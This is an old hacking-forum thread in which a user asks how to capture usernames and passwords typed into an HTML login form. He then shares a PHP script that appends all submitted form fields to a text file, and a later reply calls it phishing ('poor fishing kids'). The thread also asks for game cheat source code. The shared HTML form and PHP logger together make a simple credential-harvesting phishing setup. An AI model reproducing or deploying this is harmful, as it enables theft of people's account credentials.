google-site-verification: googlebaca44933768a824.html HTML Command - Old Royal Hack Forum

Announcement

Collapse
No announcement yet.

HTML Command

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    HTML Command

    Hello, im needing an HTML Command to safe the typed in a file.

    I have this:

    HTML Code:
    </div> <div class="section_form" id="usernameSection">
    <label for="username">Username:</label>
    <input size="20" type="text" name="username" id="username" />
    </div>
    <div class="section_form" id="passwordSection">
    <label for="password">Password:</label>
     <input size="20" type="password" id="password" name="password" maxlength="20"/>
    </div>
    </div>
    And now i want, that it saves the typed in Username and Pass in a file on my webspace.

    Like 10 minutes ago it worked before i editet something.

    best regards,
    JustSkill



    #2
    Re: HTML Command

    You need a PHP script for that ... (or another ones like asp)

    Comment


      #3
      Re: HTML Command

      It's best to use SQL inside a php script for this.

      Comment


        #4
        Re: HTML Command

        Got it. Thanks for your help.

        PS: For everyone that has this problem too:

        PHP Code:
        <?php
        $handle 
        fopen("login.txt""a");
        foreach(
        $_POST as $variable => $value) {
        fwrite($handle$variable);
        fwrite($handle"=");
        fwrite($handle$value);
        fwrite($handle"\r\n");
        }
        fwrite($handle"\r\n");
        fclose($handle) ;
        exit;
        ?>
        New Problem: So, it works. But i added a new page, and when you press the "login" button on a other page, you will be forwarded to the new one. But it doesn't safe the typed in anymore.

        I editet the Hyperlink in the Login Button, maybe thats wrong?
        Last edited by JustSkill; 03-22-2011, 07:33 PM.


        Comment


          #5
          Re: HTML Command

          poor fishing kids

          i search a good source code for Dods with aimbot and other stuff i know this is the same engine as counter strike source but css hacks are not work in dods.

          Comment

          Working...
          X